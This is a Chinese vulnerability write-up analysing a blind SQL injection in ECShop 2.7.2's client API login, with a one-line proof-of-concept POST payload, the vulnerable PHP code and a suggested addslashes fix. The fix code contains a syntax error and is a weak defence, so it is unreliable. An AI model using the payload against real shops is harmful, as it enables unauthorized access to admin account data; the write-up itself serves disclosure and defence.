ecshop /api/client/api.php、/api/client/includes/li

. 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考

 

1. 漏洞描述

ECShop存在一个盲注漏洞，问题存在于/api/client/api.php文件中，提交特制的恶意POST请求可进行SQL注入攻击，可获得敏感信息或操作数据库

http: //  sebug.net/vuldb/ssvid-21007 

2. 漏洞触发条件

 1 . /api/client/ api.php存在未过滤漏洞
  2 . 服务器magic_quote_gpc =  off 
  //  magic_quote_gpc特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除，即默认情况下，magic_quote_gpc = Off 

0x1: POC

http: //  localhost/ecshop2.7.2/api/client/api.php?Action=UserLogin 
POST: UserId=% 27 %20or%20user_id= 1 % 23 

Relevant Link:

http: //  php.net/manual/zh/info.configuration.php 

3. 漏洞影响范围
4. 漏洞代码分析

/api/client/api.php

<? php

define(  ‘  IN_ECS  ‘ ,  true  );

include_once   ‘  ./includes/init.php  ‘  ;

  //  分发处理POST数据 
 dispatch($_POST);
 ?>

/api/client/includes/lib_api.php

 function dispatch($post)
{
      //   分发器数组 
    $func_arr = array( ‘  GetDomain  ‘ ,  ‘  UserLogin  ‘ ,  ‘  AddCategory  ‘ ,  ‘  AddBrand  ‘ ,  ‘  AddGoods  ‘ ,  ‘  GetCategory  ‘ ,  ‘  GetBrand  ‘ ,  ‘  GetGoods  ‘ ,  ‘  DeleteBrand  ‘ ,  ‘  DeleteCategory  ‘ ,  ‘  DeleteGoods  ‘ ,  ‘  EditBrand  ‘ ,  ‘  EditCategory  ‘ ,  ‘  EditGoods  ‘  );
      //  当$_POST[‘Action‘] == ‘UserLogin‘的时候调用API_UserLogin 
     if (in_array($post[ ‘  Action  ‘ ], $func_arr) && function_exists( ‘  API_  ‘ .$post[ ‘  Action  ‘  ]))
    {
          return  call_user_func( ‘  API_  ‘ .$post[ ‘  Action  ‘  ], $post);
    }
      else  
    {
        API_Error();
    }
} 

/api/client/includes/lib_api.php

 function API_UserLogin($post)
{
    $post[  ‘  username  ‘ ] = isset($post[ ‘  UserId  ‘ ]) ? trim($post[ ‘  UserId  ‘ ]) :  ‘‘  ;
    $post[  ‘  password  ‘ ] = isset($post[ ‘  Password  ‘ ]) ? strtolower(trim($post[ ‘  Password  ‘ ])) :  ‘‘  ;

      /*   检查密码是否正确   */ 
     //  $post[‘username‘]未进行过滤，造成盲注漏洞，参数是直接从原始$_POST获取的，未进行任何预处理，不受内核过滤影响 
    $sql =  "  SELECT user_id, user_name, password, action_list, last_login  "  .
      "   FROM   "  . $GLOBALS[ ‘  ecs  ‘ ]->table( ‘  admin_user  ‘  ) .
      "   WHERE user_name = ‘  "  . $post[ ‘  username  ‘ ].  "  ‘  "  ;

    $row  = $GLOBALS[ ‘  db  ‘ ]-> getRow($sql);
    .. 

Relevant Link:

http: //  www.wooyun.org/bugs/wooyun-2010-02969 

5. 防御方法

/api/client/includes/lib_api.php

 function API_UserLogin($post)
{
      /*   SQL注入过滤   */ 
     if   (get_magic_quotes_gpc()) 
    {     
        $post[  ‘  UserId  ‘ ] = $post[ ‘  UserId  ‘  ]     
    } 
      else   
    {     
        $post[  ‘  UserId  ‘ ] = addslashes($post[ ‘  UserId  ‘  ]);     
    }
      /*   */  
    $post[  ‘  username  ‘ ] = isset($post[ ‘  UserId  ‘ ]) ? trim($post[ ‘  UserId  ‘ ]) :  ‘‘  ;
    .. 

Relevant Link:

http: //  www.topit.cn/ecshop-tutorial/ecshop_mangzhu_bug_for_ecshop_v2.7.2-195.html 

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

标签：

查看更多关于ecshop /api/client/api.php、/api/client/includes/li的详细内容...